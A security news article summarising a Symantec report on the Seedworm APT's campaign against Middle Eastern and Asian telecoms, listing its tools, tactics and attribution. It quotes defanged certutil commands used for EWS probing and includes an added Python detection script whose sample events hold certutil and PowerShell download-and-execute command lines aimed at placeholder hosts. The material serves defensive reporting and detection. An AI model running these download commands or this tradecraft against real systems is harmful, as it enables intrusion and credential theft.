Iran-linked Seedworm APT targets Telecoms organizations across the Middle East and Asia

Researchers uncovered a new Seedworm campaign targeting telecommunication and IT service providers in the Middle East and Asia.

Iran-linked APT group Seedworm (aka MERCURY, MuddyWater, TEMP.Zagros, or Static Kitten) is behind a new cyberespionage campaign targeting telecommunication and IT service providers in the Middle East and Asia, Symantec warns.

Seedworm has been active since at least 2017. The recent campaign has been conducted over the past six months and targeted entities in Israel, Jordan, Kuwait, Saudi Arabia, the United Arab Emirates, Pakistan, Thailand, and Laos.

The threat actors don’t use custom malware and instead rely on legitimate tools, publicly available malware, and living-off-the-land tactics.

The attackers focus on Exchange Servers in an attempt to deploy web shells and establish a backdoor within the target network.

Once a targeted network is breached, the threat actors attempt to steal credentials and move laterally.

“Attackers most likely linked to Iran have attacked a string of telecoms operators in the Middle East and Asia over the past six months, in addition to a number of IT services organizations and a utility company.” reads the report published by the experts. “In most attacks, the infection vector is unknown. Evidence of a possible vector was found at only one target. A suspected ScreenConnect setup MSI appeared to have been delivered in a zipped file named “Special discount program.zip”, suggesting that it arrived in a spear-phishing email.”

In one case analyzed by the researchers, attackers used a ZIP file named “Special discount program.zip,” which contained an installer for a remote desktop software application. The malicious archive was likely spread through spear-phishing messages.

In one of the attacks aimed at a telecommunication firm in the Middle East that began in August 2021, the threat actors created a service to launch an unknown Windows Script File (WSF) used to perform reconnaissance on the network.

The attackers then used PowerShell to download and execute more WSFs, and Certutil to download tunneling tools. They also ran WMI, which was used to get remote machines to carry out the following tasks:

  • Execute Certutil to download an unknown file
  • Execute Certutil to download an unknown WSF file and execute Wscript to launch this script
  • Execute PowerShell to download and execute content
  • Execute PowerShell to download a suspected web shell to an Exchange Server

In some intrusions the attackers mixed the use of scripts to automate the operations with a manual, hands-on-keyboard approach.

Once they had established a foothold on the target network, the cyberspies used the eHorus remote access tool to perform the following actions:

  1. Deliver and run a (suspected) Local Security Authority Subsystem Service (LSASS) dumping tool.
  2. Deliver (what are believed to be) Ligolo tunneling tools.
  3. Execute Certutil to request a URL from Exchange Web Services (EWS) of (what appears to be) other targeted organizations.

In the recent campaign against telecommunication companies, the attackers may have attempted to pivot to other targets by connecting to the Exchange Web Services (EWS) of other organizations. The threat actors used the following commands, likely to check connectivity to these organizations:

certutil.exe -urlcache -split [DASH]f hxxps://[REDACTED]/ews/exchange[.]asmx
certutil.exe -urlcache -split [DASH]f hxxps://webmail.[REDACTED][.]com/ews
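The behaviours described above (Certutil URL downloads, Wscript launching WSF files, PowerShell downloads, all driven remotely via WMI, plus Certutil requests against EWS endpoints) map cleanly onto process-creation telemetry. The following detection logic is an added example and is not part of the Symantec report or this article; the event records are constructed Sysmon-style process-creation entries with placeholder hosts and paths, and the rule names are my own.

```python
import re

# Constructed Sysmon Event ID 1-style records (image, command line, parent image).
# Hosts, IPs and paths are placeholders, not indicators from the report.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f https://webmail.example.test/ews/exchange.asmx",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    {"image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\Public\recon.wsf",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -c "Invoke-WebRequest http://198.51.100.7/s.ps1 -OutFile C:/Users/Public/s.ps1"',
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    # Benign certutil and PowerShell use that should not fire.
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -hashfile C:\tmp\setup.msi SHA256",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process",
     "parent": r"C:\Windows\explorer.exe"},
]

CERTUTIL_DL = re.compile(r"-urlcache\s+-split\s+-f\s+https?://", re.I)   # certutil as a downloader
EWS_PATH = re.compile(r"https?://\S+/ews(/exchange\.asmx)?", re.I)       # EWS connectivity probe
PS_DOWNLOAD = re.compile(r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer)", re.I)
WSF_LAUNCH = re.compile(r"\.wsf\b", re.I)
WMI_HOST = "wmiprvse.exe"  # parent when a process is started through WMI remotely

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Return the list of rule names a single process-creation event matches."""
    img, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
    hits = []
    if img == "certutil.exe" and CERTUTIL_DL.search(cmd):
        hits.append("certutil_url_download")
        if EWS_PATH.search(cmd):
            hits.append("certutil_ews_probe")
    if img in ("wscript.exe", "cscript.exe") and WSF_LAUNCH.search(cmd):
        hits.append("wsf_script_launch")
    if img == "powershell.exe" and PS_DOWNLOAD.search(cmd):
        hits.append("powershell_download")
    if hits and parent == WMI_HOST:   # remote execution via WMI raises the priority
        hits.append("spawned_via_wmi")
    return hits

def triage(events):
    """Return (image, rules) for every event that matched at least one rule."""
    return [(basename(ev["image"]), classify(ev)) for ev in events if classify(ev)]

if __name__ == "__main__":
    for image, rules in triage(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(rules)}")
```

The parent-process check is what separates this tradecraft from routine admin use of the same binaries; certutil hashing a file or an interactive PowerShell session does not match.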

Symantec reported that the attackers made heavy use of legitimate tools and publicly available hacking tools, including:

  • ScreenConnect: Legitimate remote administration tool
  • RemoteUtilities: Legitimate remote administration tool
  • eHorus: Legitimate remote administration tool
  • Ligolo: Reverse tunneling tool
  • Hidec: Command line tool for running a hidden window
  • Nping: Packet generation tool
  • LSASS Dumper: Tool that dumps credentials from Local Security Authority Subsystem Service (LSASS) process
  • SharpChisel: Tunneling tool
  • Password Dumper
  • CrackMapExec: Publicly available tool that is used to automate security assessment of an Active Directory environment
  • ProcDump: Microsoft Sysinternals tool for monitoring an application for CPU spikes and generating crash dumps, but which can also be used as a general process dump utility
  • SOCKS5 proxy server: Tunneling tool
  • Keylogger: Retrieves browser credentials
  • Mimikatz: Publicly available credential dumping tool

“There is some evidence to suggest that the Iranian Seedworm group was responsible for these attacks. Two IP addresses used in this campaign have been previously linked to Seedworm activity. However, Seedworm is known to regularly switch its infrastructure, meaning conclusive attribution cannot be made.” concludes the analysis. “There is also some overlap in tools between this campaign and earlier Seedworm campaigns. ScreenConnect, RemoteUtilities, SharpChisel, Ligolo, ProcDump, and Password Dumper were all referenced by Trend Micro in a March 2021 blog on Seedworm activity. In the case of two tools – SharpChisel and Password Dumper – identical versions were used in this campaign to those that were documented by Trend.”


Pierluigi Paganini

(SecurityAffairs – hacking, Seedworm)
